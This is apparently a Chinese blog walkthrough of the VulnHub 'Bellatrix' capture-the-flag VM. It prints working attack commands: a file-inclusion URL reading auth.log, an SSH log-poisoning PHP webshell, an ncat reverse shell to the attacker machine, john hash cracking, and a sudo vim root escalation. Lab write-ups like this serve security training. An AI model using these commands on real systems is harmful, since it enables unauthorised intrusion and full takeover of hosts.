vulnhub之Bellatrix的实践
2022-7-30 15:24:37 Author: 云计算和网络安全技术实践(查看原文) 阅读量:17 收藏

今天实践的是vulnhub的Bellatrix镜像,

下载地址,https://download.vulnhub.com/hogwarts/Bellatrix.ova,

用workstation导入成功,进行地址扫描,拿到地址192.168.58.143,

接着进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.143,

看到有http服务,浏览器访问主页,发现提示php页面,

再查看源码,提示了文件包含漏洞,

通过文件包含漏洞查看ssh登录日志文件,

http://192.168.58.143/ikilledsiriusblack.php?file=/var/log/auth.log,

向ssh登录日志文件里注入webshell,

ssh '<?php system($_GET['c']); ?>'@192.168.58.143,

再次查看ssh登录日志文件,是看不到已经注入的webshell的,

但其实是注入成功的,后来拿到shell后直接查看ssh登录日志文件就能看到,

kali攻击机上开启反弹shell监听,nc -lvp 4444,

利用webshell制造反弹shell,

http://192.168.58.143/ikilledsiriusblack.php?file=/var/log/auth.log&c=ncat -e /bin/bash  192.168.58.131 4444,

kali攻击机上得到反弹shell,不是root,需要提权,转成交互式shell,

python3 -c 'import pty; pty.spawn("/bin/bash")',

从当前账户文件里发现了一个账户和密码的hash,

在kali攻击机上使用john破解,

sudo john --wordlist=/usr/share/john/password.lst hash,

得到账户密码,lestrange/ihateharrypotter,

切到lestrange账户下,再sudo -l发现vim是root权限的,

老办法,查找vim的提权方法,

提权,sudo vim -c ':!/bin/sh',成功,id确认是root,


文章来源: http://mp.weixin.qq.com/s?__biz=MzA3MjM5MDc2Nw==&mid=2650747014&idx=1&sn=fb0bc7ce1b2e8e1ff1b570f06affccd0&chksm=87149186b06318902a3aa9707e62014a44502fb5337f90a60f3a2bce59c8de34965a153e92a1#rd
如有侵权请联系:admin#unsafe.sh